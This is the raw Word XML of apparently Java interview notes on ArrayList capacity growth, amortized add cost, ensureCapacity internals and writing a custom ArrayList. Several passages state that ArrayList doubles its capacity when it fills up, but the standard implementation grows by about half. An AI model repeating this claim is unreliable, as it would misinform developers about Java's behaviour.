    <w:p w14:paraId="7CD0661D" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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fter 40 elements, capacity grows to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA70ED" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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nd so on...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB20D1" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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Time Complexity of Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226E145" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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izing the array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when it grows) is an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operation, where n is the number of elements in the array at the time of resizing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189CEAE9" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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is because all elements from the old array have to be copied to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ECB420" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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owever, resizing happens infrequently because the ArrayList doubles in size each time. As a result, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>amortized time complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for adding elements to the ArrayList is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on average (i.e., adding elements is efficient).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C71467" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D669905" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44093A58" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31102088" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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ArrayListGrowthExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BCBDB9" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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2DC74484" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C3B6B" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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4A04BF2" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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dding 10 elements to the ArrayList (initial capacity is 10 by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E2EBF" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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or (int i = 1; i &lt;= 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA43931" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032E48A" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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B7676E0" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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ize before resizing: " + list.size());  // Output: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB22B4" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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82F1720" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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dding the 11th element will trigger resizing (capacity will double)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71970841" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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11);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A249974" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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91FCA15" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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ize after resizing: " + list.size());  // Output: 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53988AC1" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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E0FE329" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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28A5596" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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e example above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70025672" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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itially, the ArrayList has a capacity of 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB5664" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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we add the 11th element, the ArrayList will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (double its capacity) to hold more elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE0149" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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y Double the Size?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B427E2" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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Doubling the size is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common practice</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for resizing data structures like ArrayList. The idea behind this approach is that, while the resizing operation is costly, it is infrequent enough that the overall performance remains efficient. Doubling the capacity minimizes the number of resizing operations over time, leading to better overall performance when adding elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346AE531" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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Points to Remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E74559" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an ArrayList is 10 if not specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C11D1" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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the ArrayList reaches its capacity, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubles its size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to accommodate more elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19245865" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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resizing process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> involves creating a new array and copying all existing elements to the new array, which has a time complexity of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for each resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FC986" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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mortized time complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for adding elements is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on average because resizing happens infrequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC2E14F" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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Manual Capacity Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A866B" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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you know that your ArrayList will contain a large number of elements, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>set an initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid frequent resizing operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00136DDF" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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rayList&lt;Integer&gt; list = new ArrayList&lt;&gt;(100); // Initial capacity of 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AC3EF" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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is can help </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optimize performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you expect to add a large number of elements, avoiding multiple resizing operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E44640" w14:textId="5D0D0486"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5DEBD32">
          <v:rect id="_x0000_i1504" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E25CD" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95" w:rsidRDefault="003D1380">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc196307640"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain internal working of ensureCapacity method?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="780CF8E5" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95" w:rsidRDefault="003D1380">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B557B6" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95"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ensureCapacityInternal</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minCapacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2B7F5" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09881FDA" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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elementDat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DEFAULTCAPACITY_EMPTY_ELEMENTDAT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63AAC9C" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">minCapacit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EFAULT_CAPACIT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inCapacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FCC246" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B5DCF6" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>ensureExplicitCapacit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inCapacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EA8190" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95"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007953FF" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95" w:rsidRDefault="003D1380">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc196307641"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you write a custom ArrayList which will take the input capacity?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w14:paraId="21E69F29" w14:textId="3AC4B03B" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To write a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java that takes an input capacity, you can create a new class that mimics the behavior of the ArrayList but allows users to specify the initial capacity during initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27749F91" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A55F1" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Create a custom class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an internal array to store the elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FD757" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Allow the user to set the initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D507CF" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handle resizing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the internal array exceeds its capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37997CEC" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
